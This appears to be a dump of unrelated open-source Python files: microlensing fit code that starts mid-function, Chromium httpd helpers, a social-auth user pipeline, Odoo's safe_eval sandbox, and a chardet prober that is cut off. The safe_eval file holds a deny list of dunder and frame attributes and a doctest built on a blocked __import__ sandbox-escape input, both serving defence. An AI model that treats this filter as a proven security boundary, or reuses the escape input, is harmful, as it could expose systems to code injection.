max_flux = max(flux)
to_estimations.append(to)
maximum_flux_estimations.append(max_flux)
errors_magnitude.append(mean_error_magnitude)
to_guess = sum(np.array(to_estimations) / np.array(errors_magnitude) ** 2) / sum(
1 / np.array(errors_magnitude) ** 2)
survey = event.telescopes[0]
lightcurve = survey.lightcurve_magnitude
lightcurve = lightcurve[lightcurve[:, 0].argsort(), :]
## fs, uo, tE estimations only one the survey telescope
time = lightcurve[:, 0]
flux = microltoolbox.magnitude_to_flux(lightcurve[:, 1])
errflux = microltoolbox.error_magnitude_to_error_flux(lightcurve[:, 2], flux)
# fs estimation, no blend
baseline_flux_0 = np.min(flux)
baseline_flux = np.median(flux)
while np.abs(baseline_flux_0 - baseline_flux) > 0.01 * baseline_flux:
baseline_flux_0 = baseline_flux
indexes = np.where((flux < baseline_flux))[0].tolist() + np.where(
np.abs(flux - baseline_flux) < np.abs(errflux))[0].tolist()
baseline_flux = np.median(flux[indexes])
if len(indexes) < 100:
baseline_flux = np.median(flux[flux.argsort()[:100]])
break
fs_guess = baseline_flux
# uo estimation
max_flux = maximum_flux_estimations[0]
Amax = max_flux / fs_guess
if (Amax < 1.0) | np.isnan(Amax):
Amax = 1.1
uo_guess = np.sqrt(-2 + 2 * np.sqrt(1 - 1 / (1 - Amax ** 2)))
# tE estimations
tE_guesses = []
# Method 1 : flux(t_demi_amplification) = 0.5 * fs_guess * (Amax + 1)
half_magnification = 0.5 * (Amax + 1)
flux_demi_amplification = fs_guess * half_magnification
index_plus = np.where((time > to_guess) & (flux < flux_demi_amplification))[0]
index_moins = np.where((time < to_guess) & (flux < flux_demi_amplification))[0]
if len(index_plus) != 0:
if len(index_moins) != 0:
t_demi_amplification = (time[index_plus[0]] - time[index_moins[-1]])
tE_demi_amplification = t_demi_amplification / (
2 * np.sqrt(-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2))
tE_guesses.append(tE_demi_amplification)
else:
t_demi_amplification = time[index_plus[0]] - to_guess
tE_demi_amplification = t_demi_amplification / np.sqrt(
-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2)
tE_guesses.append(tE_demi_amplification)
else:
if len(index_moins) != 0:
t_demi_amplification = to_guess - time[index_moins[-1]]
tE_demi_amplification = t_demi_amplification / np.sqrt(
-2 + 2 * np.sqrt(1 + 1 / (half_magnification ** 2 - 1)) - uo_guess ** 2)
tE_guesses.append(tE_demi_amplification)
# Method 2 : flux(t_E) = fs_guess * (uo^+3)/[(uo^2+1)^0.5*(uo^2+5)^0.5]
amplification_tE = (uo_guess ** 2 + 3) / ((uo_guess ** 2 + 1) ** 0.5 * np.sqrt(uo_guess ** 2 + 5))
flux_tE = fs_guess * amplification_tE
index_tE_plus = np.where((flux < flux_tE) & (time > to))[0]
index_tE_moins = np.where((flux < flux_tE) & (time < to))[0]
if len(index_tE_moins) != 0:
index_tE_moins = index_tE_moins[-1]
tE_moins = to_guess - time[index_tE_moins]
tE_guesses.append(tE_moins)
if len(index_tE_plus) != 0:
index_tE_plus = index_tE_plus[0]
tE_plus = time[index_tE_plus] - to_guess
tE_guesses.append(tE_plus)
# Method 3 : the first points before/after to_guess that reach the baseline. Very rough
# approximation ot tE.
index_tE_baseline_plus = np.where((time > to) & (np.abs(flux - fs_guess) < np.abs(errflux)))[0]
index_tE_baseline_moins = np.where((time < to) & (np.abs(flux - fs_guess) < np.abs(errflux)))[0]
if len(index_tE_baseline_plus) != 0:
tEPlus = time[index_tE_baseline_plus[0]] - to_guess
tE_guesses.append(tEPlus)
if len(index_tE_baseline_moins) != 0:
tEMoins = to_guess - time[index_tE_baseline_moins[-1]]
tE_guesses.append(tEMoins)
tE_guess = np.median(tE_guesses)
# safety reason, unlikely
if (tE_guess < 0.1) | np.isnan(tE_guess):
tE_guess = 20.0
# [to,uo,tE], fsource
return [to_guess, uo_guess, tE_guess], fs_guess
def initial_guess_FSPL(event):
"""Function to find initial FSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit on. More details on the
event module.
:return: the FSPL guess for this event. A list of parameters associated to the FSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
PSPL_guess, fs_guess = initial_guess_PSPL(event)
# Dummy guess
rho_guess = 0.05
FSPL_guess = PSPL_guess + [rho_guess]
# [to,uo,tE,rho], fsource
return FSPL_guess, fs_guess
def initial_guess_DSPL(event):
"""Function to find initial DSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit on. More details on the
event module.
:return: the DSPL guess for this event. A list of parameters associated to the DSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
PSPL_guess, fs_guess = initial_guess_PSPL(event)
filters = [telescope.filter for telescope in event.telescopes]
unique_filters = np.unique(filters)
# Dummy guess
delta_to_guess = 5 # days
delta_uo_guess = 0.01
q_flux_guess = 0.5
DSPL_guess = PSPL_guess[:2] + [delta_to_guess] + [delta_uo_guess] + \
[PSPL_guess[2]] + [q_flux_guess] * len(unique_filters)
# [to1,uo1,delta_to,uo2,tE,q_F_i], fsource
return DSPL_guess, fs_guess
def differential_evolution_parameters_boundaries(model):
""" This function define the parameters boundaries for a specific model.
:param object model: a microlmodels object.
:return: parameters_boundaries, a list of tuple containing parameters limits
:rtype: list
"""
minimum_observing_time_telescopes = [min(telescope.lightcurve_flux[:, 0]) - 0 for telescope in
model.event.telescopes]
maximum_observing_time_telescopes = [max(telescope.lightcurve_flux[:, 0]) + 0 for telescope in
model.event.telescopes]
to_boundaries = (min(minimum_observing_time_telescopes), max(maximum_observing_time_telescopes))
delta_to_boundaries = (-150, 150)
delta_uo_boundaries = (-1.0, 1.0)
uo_boundaries = (0.0, 1.0)
tE_boundaries = (0.1, 500)
rho_boundaries = (5 * 10 ** -5, 0.05)
q_flux_boundaries = (0.001, 1.0)
logs_boundaries = (-1.0, 1.0)
logq_boundaries = (-6.0, 0.0)
alpha_boundaries = (-np.pi, np.pi)
piEN_boundaries = (-2.0, 2.0)
piEE_boundaries = (-2.0, 2.0)
XiEN_boundaries = (-2.0, 2.0)
XiEE_boundaries = (-2.0, 2.0)
dsdt_boundaries = (-10,10)
dalphadt_boundaries = (-10,10)
v_boundaries = (-2,2)
mass_boundaries = [10**-1,10]
rE_boundaries = [10**-1,100]
v_boundaries = (-2,2)
ra_xal_boundaries = [0,360]
dec_xal_boundaries = [-90,90]
period_xal_boundaries = [0.001,1000]
ecc_xal_boundaries = [0,1]
t_peri_xal_boundaries = to_boundaries
# model_xallarap_boundaries = {'None': [], 'True': [(-2.0, 2.0), (-2.0, 2.0)]}
# model_orbital_motion_boundaries = {'None': [], '2D': [], '3D': []}
# model_source_spots_boundaries = {'None': []}
period_variable = (0.001,1000)
phase_variable = (-np.pi, np.pi)
amplitude_variable = (0.0, 3.0)
octave_variable = (10**-10,1)
q_boundaries = (-2, 2)
# Paczynski models boundaries
if model.model_type == 'PSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries]
if model.model_type == 'FSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, rho_boundaries]
if model.model_type == 'DSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, delta_to_boundaries,
delta_uo_boundaries, tE_boundaries]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
parameters_boundaries += [q_flux_boundaries] * len(unique_filters)
if model.model_type == 'DFSPL':
parameters_boundaries = [to_boundaries, uo_boundaries, delta_to_boundaries,
delta_uo_boundaries, tE_boundaries,rho_boundaries,rho_boundaries]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
parameters_boundaries += [q_flux_boundaries] * len(unique_filters)
if model.model_type == 'PSBL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, logs_boundaries,
logq_boundaries, alpha_boundaries]
if (model.model_type == 'USBL') or (model.model_type == 'FSBL'):
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries, rho_boundaries, logs_boundaries,
logq_boundaries, alpha_boundaries]
#fluxes = [(0,np.max(telescope.lightcurve_flux[:,1])) for telescope in model.event.telescopes]
#blend = [(0,100) for telescope in model.event.telescopes]
#for ind,telo in enumerate(model.event.telescopes):
#parameters_boundaries+=[fluxes[ind], blend[ind]]
if model.model_type == 'VariablePL':
parameters_boundaries = [to_boundaries, uo_boundaries, tE_boundaries,rho_boundaries, period_variable]
filters = [telescope.filter for telescope in model.event.telescopes]
unique_filters = np.unique(filters)
for i in range(model.number_of_harmonics):
for j in unique_filters:
parameters_boundaries += [amplitude_variable]
parameters_boundaries += [phase_variable]
parameters_boundaries += [octave_variable]
# Second order boundaries
if model.parallax_model[0] != 'None':
parameters_boundaries.append(piEN_boundaries)
parameters_boundaries.append(piEE_boundaries)
if model.xallarap_model[0] != 'None':
parameters_boundaries.append(XiEN_boundaries)
parameters_boundaries.append(XiEE_boundaries)
parameters_boundaries.append(ra_xal_boundaries)
parameters_boundaries.append(dec_xal_boundaries)
parameters_boundaries.append(period_xal_boundaries)
if model.xallarap_model[0] != 'Circular':
parameters_boundaries.append(ecc_xal_boundaries)
parameters_boundaries.append(t_peri_xal_boundaries)
if model.orbital_motion_model[0] == '2D':
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dalphadt_boundaries)
if model.orbital_motion_model[0] == 'Circular':
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dsdt_boundaries)
parameters_boundaries.append(dsdt_boundaries)
if model.orbital_motion_model[0] == 'Keplerian':
parameters_boundaries.append(logs_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(v_boundaries)
parameters_boundaries.append(mass_boundaries)
parameters_boundaries.append(rE_boundaries)
# if source_spots
return parameters_boundaries
def MCMC_parameters_initialization(parameter_key, parameters_dictionnary, parameters):
"""Generate a random parameter for the MCMC initialization.
:param str parameter_key: the parameter on which we apply the function
:param dict parameters_dictionnary: the dictionnary of parameters keys associared to the parameters input
:param list parameters: a list of float which indicate the model parameters
:return: a list containing the trial(s) associated to the parameter_key string
:rtype: list of float
"""
#if ('to' in parameter_key) :
# epsilon = np.random.uniform(-0.01, 0.01)
# to_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [to_parameters_trial]
# if 'fs' in parameter_key:
# epsilon = np.random.uniform(0,0.0001)
# fs_trial = parameters[parameters_dictionnary[parameter_key]] +epsilon
#g_trial = (1 + parameters[parameters_dictionnary[parameter_key] + 1]) / epsilon - 1
# epsilon = np.random.uniform(0,0.0001)
# g_trial = parameters[parameters_dictionnary[parameter_key] + 1] +epsilon
# return [fs_trial, g_trial]
# return
#if ('g_' in parameter_key) or ('fb_' in parameter_key):
# return
# if 'pi' in parameter_key:
# epsilon = np.random.uniform(0.9, 1.1)
# sign = np.random.choice([-1,1])
# pi_trial = sign*parameters[parameters_dictionnary[parameter_key]] * epsilon
# return [pi_trial]
#if 'rho' in parameter_key:
# epsilon = np.random.uniform(0.99, 1.01)
# rho_parameters_trial = parameters[parameters_dictionnary[parameter_key]] * epsilon
# return [rho_parameters_trial]
#if 'logs' in parameter_key:
# epsilon = np.random.uniform(-0.05, 0.05)
# logs_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [logs_parameters_trial]
#if 'logq' in parameter_key:
# epsilon = np.random.uniform(-0.05, 0.05)
# logq_parameters_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
# return [logq_parameters_trial]
epsilon = np.random.uniform(-1, 1)*10**-6
all_other_parameter_trial = parameters[parameters_dictionnary[parameter_key]] + epsilon
return [all_other_parameter_trial]
|
boundarydevices/android_external_chromium_org
|
refs/heads/cm-12.0
|
tools/python/google/platform_utils_mac.py
|
183
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Platform-specific utility methods shared by several scripts."""
import os
import subprocess
import google.path_utils
class PlatformUtility(object):
def __init__(self, base_dir):
"""Args:
base_dir: the base dir for running tests.
"""
self._base_dir = base_dir
self._httpd_cmd_string = None # used for starting/stopping httpd
self._bash = "/bin/bash"
def _UnixRoot(self):
"""Returns the path to root."""
return "/"
def GetFilesystemRoot(self):
"""Returns the root directory of the file system."""
return self._UnixRoot()
def GetTempDirectory(self):
"""Returns the file system temp directory
Note that this does not use a random subdirectory, so it's not
intrinsically secure. If you need a secure subdir, use the tempfile
package.
"""
return os.getenv("TMPDIR", "/tmp")
def FilenameToUri(self, path, use_http=False, use_ssl=False, port=8000):
"""Convert a filesystem path to a URI.
Args:
path: For an http URI, the path relative to the httpd server's
DocumentRoot; for a file URI, the full path to the file.
use_http: if True, returns a URI of the form http://127.0.0.1:8000/.
If False, returns a file:/// URI.
use_ssl: if True, returns HTTPS URL (https://127.0.0.1:8000/).
This parameter is ignored if use_http=False.
port: The port number to append when returning an HTTP URI
"""
if use_http:
protocol = 'http'
if use_ssl:
protocol = 'https'
return "%s://127.0.0.1:%d/%s" % (protocol, port, path)
return "file://" + path
def GetStartHttpdCommand(self, output_dir,
httpd_conf_path, mime_types_path,
document_root=None, apache2=False):
"""Prepares the config file and output directory to start an httpd server.
Returns a list of strings containing the server's command line+args.
Args:
output_dir: the path to the server's output directory, for log files.
It will be created if necessary.
httpd_conf_path: full path to the httpd.conf file to be used.
mime_types_path: full path to the mime.types file to be used.
document_root: full path to the DocumentRoot. If None, the DocumentRoot
from the httpd.conf file will be used. Note that the httpd.conf
file alongside this script does not specify any DocumentRoot, so if
you're using that one, be sure to specify a document_root here.
apache2: boolean if true will cause this function to return start
command for Apache 2.x as opposed to Apache 1.3.x. This flag
is ignored on Mac (but preserved here for compatibility in
function signature with win), where httpd2 is used always
"""
exe_name = "httpd"
cert_file = google.path_utils.FindUpward(self._base_dir, 'tools',
'python', 'google',
'httpd_config', 'httpd2.pem')
ssl_enabled = os.path.exists('/etc/apache2/mods-enabled/ssl.conf')
httpd_vars = {
"httpd_executable_path":
os.path.join(self._UnixRoot(), "usr", "sbin", exe_name),
"httpd_conf_path": httpd_conf_path,
"ssl_certificate_file": cert_file,
"document_root" : document_root,
"server_root": os.path.join(self._UnixRoot(), "usr"),
"mime_types_path": mime_types_path,
"output_dir": output_dir,
"ssl_mutex": "file:"+os.path.join(output_dir, "ssl_mutex"),
"user": os.environ.get("USER", "#%d" % os.geteuid()),
"lock_file": os.path.join(output_dir, "accept.lock"),
}
google.path_utils.MaybeMakeDirectory(output_dir)
# We have to wrap the command in bash
# -C: process directive before reading config files
# -c: process directive after reading config files
# Apache wouldn't run CGIs with permissions==700 unless we add
# -c User "<username>"
httpd_cmd_string = (
'%(httpd_executable_path)s'
' -f %(httpd_conf_path)s'
' -c \'TypesConfig "%(mime_types_path)s"\''
' -c \'CustomLog "%(output_dir)s/access_log.txt" common\''
' -c \'ErrorLog "%(output_dir)s/error_log.txt"\''
' -c \'PidFile "%(output_dir)s/httpd.pid"\''
' -C \'User "%(user)s"\''
' -C \'ServerRoot "%(server_root)s"\''
' -c \'LockFile "%(lock_file)s"\''
)
if document_root:
httpd_cmd_string += ' -C \'DocumentRoot "%(document_root)s"\''
if ssl_enabled:
httpd_cmd_string += (
' -c \'SSLCertificateFile "%(ssl_certificate_file)s"\''
' -c \'SSLMutex "%(ssl_mutex)s"\''
)
# Save a copy of httpd_cmd_string to use for stopping httpd
self._httpd_cmd_string = httpd_cmd_string % httpd_vars
httpd_cmd = [self._bash, "-c", self._httpd_cmd_string]
return httpd_cmd
def GetStopHttpdCommand(self):
"""Returns a list of strings that contains the command line+args needed to
stop the http server used in the http tests.
This tries to fetch the pid of httpd (if available) and returns the
command to kill it. If pid is not available, kill all httpd processes
"""
if not self._httpd_cmd_string:
return ["true"] # Haven't been asked for the start cmd yet. Just pass.
# Add a sleep after the shutdown because sometimes it takes some time for
# the port to be available again.
return [self._bash, "-c", self._httpd_cmd_string + ' -k stop && sleep 5']
|
tutumcloud/python-social-auth
|
refs/heads/master
|
social/pipeline/user.py
|
8
|
from uuid import uuid4
from social.utils import slugify, module_member
USER_FIELDS = ['username', 'email']
def get_username(strategy, details, user=None, *args, **kwargs):
if 'username' not in strategy.setting('USER_FIELDS', USER_FIELDS):
return
storage = strategy.storage
if not user:
email_as_username = strategy.setting('USERNAME_IS_FULL_EMAIL', False)
uuid_length = strategy.setting('UUID_LENGTH', 16)
max_length = storage.user.username_max_length()
do_slugify = strategy.setting('SLUGIFY_USERNAMES', False)
do_clean = strategy.setting('CLEAN_USERNAMES', True)
if do_clean:
clean_func = storage.user.clean_username
else:
clean_func = lambda val: val
if do_slugify:
override_slug = strategy.setting('SLUGIFY_FUNCTION')
if override_slug:
slug_func = module_member(override_slug)
else:
slug_func = slugify
else:
slug_func = lambda val: val
if email_as_username and details.get('email'):
username = details['email']
elif details.get('username'):
username = details['username']
else:
username = uuid4().hex
short_username = username[:max_length - uuid_length]
final_username = slug_func(clean_func(username[:max_length]))
# Generate a unique username for current user using username
# as base but adding a unique hash at the end. Original
# username is cut to avoid any field max_length.
while storage.user.user_exists(username=final_username):
username = short_username + uuid4().hex[:uuid_length]
final_username = slug_func(clean_func(username[:max_length]))
else:
final_username = storage.user.get_username(user)
return {'username': final_username}
def create_user(strategy, details, user=None, *args, **kwargs):
if user:
return {'is_new': False}
fields = dict((name, kwargs.get(name) or details.get(name))
for name in strategy.setting('USER_FIELDS',
USER_FIELDS))
if not fields:
return
return {
'is_new': True,
'user': strategy.create_user(**fields)
}
def user_details(strategy, details, user=None, *args, **kwargs):
"""Update user details using data from provider."""
if user:
changed = False # flag to track changes
protected = strategy.setting('PROTECTED_USER_FIELDS', [])
keep = ('username', 'id', 'pk') + tuple(protected)
for name, value in details.items():
# do not update username, it was already generated
# do not update configured fields if user already existed
if name not in keep and hasattr(user, name):
if value and value != getattr(user, name, None):
try:
setattr(user, name, value)
changed = True
except AttributeError:
pass
if changed:
strategy.storage.user.changed(user)
|
jk1/intellij-community
|
refs/heads/master
|
python/testData/intentions/replaceBackQuoteExpression_after.py
|
83
|
repr(a + b, 34 + a)
|
fhe-odoo/odoo
|
refs/heads/8.0
|
openerp/tools/safe_eval.py
|
25
|
# -*- coding: utf-8 -*-
##############################################################################
# Copyright (C) 2004-2014 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""
safe_eval module - methods intended to provide more restricted alternatives to
evaluate simple and/or untrusted code.
Methods in this module are typically used as alternatives to eval() to parse
OpenERP domain strings, conditions and expressions, mostly based on locals
condition/math builtins.
"""
# Module partially ripped from/inspired by several different sources:
# - http://code.activestate.com/recipes/286134/
# - safe_eval in lp:~xrg/openobject-server/optimize-5.0
# - safe_eval in tryton http://hg.tryton.org/hgwebdir.cgi/trytond/rev/bbb5f73319ad
from opcode import HAVE_ARGUMENT, opmap, opname
from types import CodeType
import logging
from .misc import ustr
import openerp
__all__ = ['test_expr', 'safe_eval', 'const_eval']
# The time module is usually already provided in the safe_eval environment
# but some code, e.g. datetime.datetime.now() (Windows/Python 2.5.2, bug
# lp:703841), does import time.
_ALLOWED_MODULES = ['_strptime', 'math', 'time']
_UNSAFE_ATTRIBUTES = ['f_builtins', 'f_globals', 'f_locals', 'gi_frame',
'co_code', 'func_globals']
_CONST_OPCODES = set(opmap[x] for x in [
'POP_TOP', 'ROT_TWO', 'ROT_THREE', 'ROT_FOUR', 'DUP_TOP', 'DUP_TOPX',
'POP_BLOCK','SETUP_LOOP', 'BUILD_LIST', 'BUILD_MAP', 'BUILD_TUPLE',
'LOAD_CONST', 'RETURN_VALUE', 'STORE_SUBSCR', 'STORE_MAP'] if x in opmap)
_EXPR_OPCODES = _CONST_OPCODES.union(set(opmap[x] for x in [
'UNARY_POSITIVE', 'UNARY_NEGATIVE', 'UNARY_NOT',
'UNARY_INVERT', 'BINARY_POWER', 'BINARY_MULTIPLY',
'BINARY_DIVIDE', 'BINARY_FLOOR_DIVIDE', 'BINARY_TRUE_DIVIDE',
'BINARY_MODULO', 'BINARY_ADD', 'BINARY_SUBTRACT', 'BINARY_SUBSCR',
'BINARY_LSHIFT', 'BINARY_RSHIFT', 'BINARY_AND', 'BINARY_XOR',
'BINARY_OR', 'INPLACE_ADD', 'INPLACE_SUBTRACT', 'INPLACE_MULTIPLY',
'INPLACE_DIVIDE', 'INPLACE_REMAINDER', 'INPLACE_POWER',
'INPLACE_LEFTSHIFT', 'INPLACE_RIGHTSHIFT', 'INPLACE_AND',
'INPLACE_XOR','INPLACE_OR'
] if x in opmap))
_SAFE_OPCODES = _EXPR_OPCODES.union(set(opmap[x] for x in [
'LOAD_NAME', 'CALL_FUNCTION', 'COMPARE_OP', 'LOAD_ATTR',
'STORE_NAME', 'GET_ITER', 'FOR_ITER', 'LIST_APPEND', 'DELETE_NAME',
'JUMP_FORWARD', 'JUMP_IF_TRUE', 'JUMP_IF_FALSE', 'JUMP_ABSOLUTE',
'MAKE_FUNCTION', 'SLICE+0', 'SLICE+1', 'SLICE+2', 'SLICE+3', 'BREAK_LOOP',
'CONTINUE_LOOP', 'RAISE_VARARGS', 'YIELD_VALUE',
# New in Python 2.7 - http://bugs.python.org/issue4715 :
'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'POP_JUMP_IF_FALSE',
'POP_JUMP_IF_TRUE', 'SETUP_EXCEPT', 'END_FINALLY',
'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'UNPACK_SEQUENCE',
'LOAD_GLOBAL', # Only allows access to restricted globals
] if x in opmap))
_logger = logging.getLogger(__name__)
def _get_opcodes(codeobj):
"""_get_opcodes(codeobj) -> [opcodes]
Extract the actual opcodes as a list from a code object
>>> c = compile("[1 + 2, (1,2)]", "", "eval")
>>> _get_opcodes(c)
[100, 100, 23, 100, 100, 102, 103, 83]
"""
i = 0
byte_codes = codeobj.co_code
while i < len(byte_codes):
code = ord(byte_codes[i])
yield code
if code >= HAVE_ARGUMENT:
i += 3
else:
i += 1
def assert_no_dunder_name(code_obj, expr):
""" assert_no_dunder_name(code_obj, expr) -> None
Asserts that the code object does not refer to any "dunder name"
(__$name__), so that safe_eval prevents access to any internal-ish Python
attribute or method (both are loaded via LOAD_ATTR which uses a name, not a
const or a var).
Checks that no such name exists in the provided code object (co_names).
:param code_obj: code object to name-validate
:type code_obj: CodeType
:param str expr: expression corresponding to the code object, for debugging
purposes
:raises NameError: in case a forbidden name (containing two underscores)
is found in ``code_obj``
.. note:: actually forbids every name containing 2 underscores
"""
for name in code_obj.co_names:
if "__" in name or name in _UNSAFE_ATTRIBUTES:
raise NameError('Access to forbidden name %r (%r)' % (name, expr))
def assert_valid_codeobj(allowed_codes, code_obj, expr):
""" Asserts that the provided code object validates against the bytecode
and name constraints.
Recursively validates the code objects stored in its co_consts in case
lambdas are being created/used (lambdas generate their own separated code
objects and don't live in the root one)
:param allowed_codes: list of permissible bytecode instructions
:type allowed_codes: set(int)
:param code_obj: code object to name-validate
:type code_obj: CodeType
:param str expr: expression corresponding to the code object, for debugging
purposes
:raises ValueError: in case of forbidden bytecode in ``code_obj``
:raises NameError: in case a forbidden name (containing two underscores)
is found in ``code_obj``
"""
assert_no_dunder_name(code_obj, expr)
for opcode in _get_opcodes(code_obj):
if opcode not in allowed_codes:
raise ValueError(
"opcode %s not allowed (%r)" % (opname[opcode], expr))
for const in code_obj.co_consts:
if isinstance(const, CodeType):
assert_valid_codeobj(allowed_codes, const, 'lambda')
def test_expr(expr, allowed_codes, mode="eval"):
"""test_expr(expression, allowed_codes[, mode]) -> code_object
Test that the expression contains only the allowed opcodes.
If the expression is valid and contains only allowed codes,
return the compiled code object.
Otherwise raise a ValueError, a Syntax Error or TypeError accordingly.
"""
try:
if mode == 'eval':
# eval() does not like leading/trailing whitespace
expr = expr.strip()
code_obj = compile(expr, "", mode)
except (SyntaxError, TypeError, ValueError):
raise
except Exception, e:
import sys
exc_info = sys.exc_info()
raise ValueError, '"%s" while compiling\n%r' % (ustr(e), expr), exc_info[2]
assert_valid_codeobj(allowed_codes, code_obj, expr)
return code_obj
def const_eval(expr):
"""const_eval(expression) -> value
Safe Python constant evaluation
Evaluates a string that contains an expression describing
a Python constant. Strings that are not valid Python expressions
or that contain other code besides the constant raise ValueError.
>>> const_eval("10")
10
>>> const_eval("[1,2, (3,4), {'foo':'bar'}]")
[1, 2, (3, 4), {'foo': 'bar'}]
>>> const_eval("1+2")
Traceback (most recent call last):
...
ValueError: opcode BINARY_ADD not allowed
"""
c = test_expr(expr, _CONST_OPCODES)
return eval(c)
def expr_eval(expr):
"""expr_eval(expression) -> value
Restricted Python expression evaluation
Evaluates a string that contains an expression that only
uses Python constants. This can be used to e.g. evaluate
a numerical expression from an untrusted source.
>>> expr_eval("1+2")
3
>>> expr_eval("[1,2]*2")
[1, 2, 1, 2]
>>> expr_eval("__import__('sys').modules")
Traceback (most recent call last):
...
ValueError: opcode LOAD_NAME not allowed
"""
c = test_expr(expr, _EXPR_OPCODES)
return eval(c)
def _import(name, globals=None, locals=None, fromlist=None, level=-1):
if globals is None:
globals = {}
if locals is None:
locals = {}
if fromlist is None:
fromlist = []
if name in _ALLOWED_MODULES:
return __import__(name, globals, locals, level)
raise ImportError(name)
def safe_eval(expr, globals_dict=None, locals_dict=None, mode="eval", nocopy=False, locals_builtins=False):
"""safe_eval(expression[, globals[, locals[, mode[, nocopy]]]]) -> result
System-restricted Python expression evaluation
Evaluates a string that contains an expression that mostly
uses Python constants, arithmetic expressions and the
objects directly provided in context.
This can be used to e.g. evaluate
an OpenERP domain expression from an untrusted source.
:throws TypeError: If the expression provided is a code object
:throws SyntaxError: If the expression provided is not valid Python
:throws NameError: If the expression provided accesses forbidden names
:throws ValueError: If the expression provided uses forbidden bytecode
"""
if isinstance(expr, CodeType):
raise TypeError("safe_eval does not allow direct evaluation of code objects.")
if globals_dict is None:
globals_dict = {}
# prevent altering the globals/locals from within the sandbox
# by taking a copy.
if not nocopy:
# isinstance() does not work below, we want *exactly* the dict class
if (globals_dict is not None and type(globals_dict) is not dict) \
or (locals_dict is not None and type(locals_dict) is not dict):
_logger.warning(
"Looks like you are trying to pass a dynamic environment, "
"you should probably pass nocopy=True to safe_eval().")
globals_dict = dict(globals_dict)
if locals_dict is not None:
locals_dict = dict(locals_dict)
globals_dict.update(
__builtins__={
'__import__': _import,
'True': True,
'False': False,
'None': None,
'str': str,
'unicode': unicode,
'bool': bool,
'int': int,
'float': float,
'long': long,
'enumerate': enumerate,
'dict': dict,
'list': list,
'tuple': tuple,
'map': map,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'reduce': reduce,
'filter': filter,
'round': round,
'len': len,
'repr': repr,
'set': set,
'all': all,
'any': any,
'ord': ord,
'chr': chr,
'cmp': cmp,
'divmod': divmod,
'isinstance': isinstance,
'range': range,
'xrange': xrange,
'zip': zip,
'Exception': Exception,
}
)
if locals_builtins:
if locals_dict is None:
locals_dict = {}
locals_dict.update(globals_dict.get('__builtins__'))
c = test_expr(expr, _SAFE_OPCODES, mode=mode)
try:
return eval(c, globals_dict, locals_dict)
except openerp.osv.orm.except_orm:
raise
except openerp.exceptions.Warning:
raise
except openerp.exceptions.RedirectWarning:
raise
except openerp.exceptions.AccessDenied:
raise
except openerp.exceptions.AccessError:
raise
except Exception, e:
import sys
exc_info = sys.exc_info()
raise ValueError, '"%s" while evaluating\n%r' % (ustr(e), expr), exc_info[2]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
stutivarshney/Bal-Aveksha
|
refs/heads/master
|
WebServer/BalAvekshaEnv/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/sjisprober.py
|
1776
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(SJISSMModel)
self._mDistributionAnalyzer = SJISDistributionAnalysis()
self._mContextAnalyzer = SJISContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
